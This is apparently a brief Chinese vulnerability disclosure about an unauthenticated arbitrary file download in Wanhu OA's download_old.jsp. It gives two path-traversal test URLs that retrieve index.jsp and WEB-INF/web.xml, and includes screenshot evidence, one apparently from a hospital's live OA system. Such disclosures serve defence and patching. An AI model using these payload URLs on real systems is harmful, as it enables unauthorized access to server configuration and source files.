### 简要描述:
万户OA任意文件下载漏洞
### 详细说明:
万户OAdownload_old.jsp文件可以任意访问,导致无需登录,下载任意文件
测试URL:
/defaultroot/download_old.jsp?path=..&name=x&FileName=index.jsp
/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml
快下班了,时间不够了,测试地址就不贴了,自行测试哈。。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201409/2616485908d3615470a5c28c7b43a839e83a5041.jpg" alt="QQ截图20140926164811.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2616485908d3615470a5c28c7b43a839e83a5041.jpg)
[<img src="https://images.seebug.org/upload/201409/261649335b8f5de213788a30258377781daebfd3.jpg" alt="22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/261649335b8f5de213788a30258377781daebfd3.jpg)
[<img src="https://images.seebug.org/upload/201409/26165006843219571d0a64128ad1259810d045b8.jpg" alt="赤峰附院OA,任意文件下载1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/26165006843219571d0a64128ad1259810d045b8.jpg)
暂无评论